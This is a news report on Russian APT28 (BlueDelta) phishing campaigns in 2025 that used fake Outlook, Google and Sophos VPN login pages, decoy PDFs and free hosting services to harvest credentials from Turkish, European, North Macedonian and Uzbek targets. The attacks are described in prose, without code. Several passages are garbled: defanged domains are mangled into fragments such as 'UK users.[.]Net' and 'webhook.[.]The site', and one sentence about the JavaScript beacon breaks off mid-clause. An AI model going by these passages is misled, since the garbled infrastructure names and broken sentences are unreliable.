Russian state-sponsored threat actors have been linked to a new set of credential harvesting attacks targeting individuals associated with Turkey’s Energy and Nuclear Research Agency, as well as employees associated with a European think tank and organizations in North Macedonia and Uzbekistan.
The activity, attributed to APT28 (aka BlueDelta), was attributed to a “persistent” credential-harvesting campaign targeting UK users.[.]Net last month. APT28 is linked to the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).
Recorded Future’s Insikt Group said, “The use of Turkish-language and regionally targeted lure content shows that BlueDelta has tailored its content to enhance credibility among specific professional and geographic audiences.” “These selections reflect continued interest in organizations associated with energy research, defense cooperation, and government communications networks related to Russian intelligence priorities.”
The cybersecurity company described the attacks as targeting a small but specific group of victims in February and September 2025, with the campaign taking advantage of fake login pages that were styled similar to popular services like Microsoft Outlook Web Access (OWA), Google and Sophos VPN Portal.
These efforts are notable for the fact that unsuspecting users are redirected to legitimate sites after entering credentials on fake landing pages, thereby avoiding raising any red flags. It also found that campaigns rely heavily on services like webhooks[.]The site, InfinityFree, Byte Internet Services and Ngrok, to host phishing pages, exfiltrate the stolen data and enable redirection.
In a further attempt to give them the facade of legitimacy, the threat actors are said to have used legitimate PDF lure documents, including a publication from the Gulf Research Center related to a June 2025 Iran-Israel war and a July 2025 policy briefing for a new agreement for the Mediterranean issued by climate change think tank ECCO.
The attack chain begins with a phishing email containing a shortened link that, when clicked, redirects victims to another link hosted on a webhook.[.]The site, which briefly displays the decoy document for about two seconds before redirecting to another webhook[.]Site that hosts a fake Microsoft OWA login page.
There exists a hidden HTML form element within this page that stores a webhook.[.]The site uses JavaScript to generate URLs and send
The “page opened” beacon transmits the submitted credentials to the webhook endpoint, and ultimately redirects back to the PDF hosted on the actual website.
APT28 has also been observed running three other campaigns –
- A June 2025 campaign that deployed a credential-harvesting page mimicking the Sophos VPN password reset page hosted on infrastructure provided by InfinityFree to collect credentials entered into forms and redirect victims to a legitimate Sophos VPN portal belonging to an unnamed EU think tank.
- A September 2025 campaign in which credential-harvesting pages hosted on InfinityFree domains were used to falsely warn users about expired passwords to trick them into entering their credentials and redirect them to legitimate login pages associated with a military organization in the Republic of North Macedonia and an IT integrator based in Uzbekistan.
- An April 2025 campaign that used a fake Google password reset page hosted on Byte Internet Services to collect victims’ credentials and trick them into an Ngrok URL
“BlueDelta’s continued abuse of legitimate Internet service infrastructure reflects the group’s continued reliance on disposable services to host and relay credential data,” the MasterCard-owned company said. “These campaigns underscore the GRU’s continued commitment to credential harvesting as a low-cost, high-yield method of collecting information that supports Russian intelligence objectives.”
